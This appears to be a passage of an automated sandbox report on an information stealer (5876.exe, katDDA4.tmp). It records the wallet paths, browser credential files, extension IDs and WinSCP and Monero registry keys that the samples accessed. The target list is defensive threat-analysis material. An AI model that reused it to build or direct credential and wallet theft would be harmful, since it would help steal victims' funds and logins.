Source: Yara match	File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Opens network shares

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: \\config\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: \\config\			Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
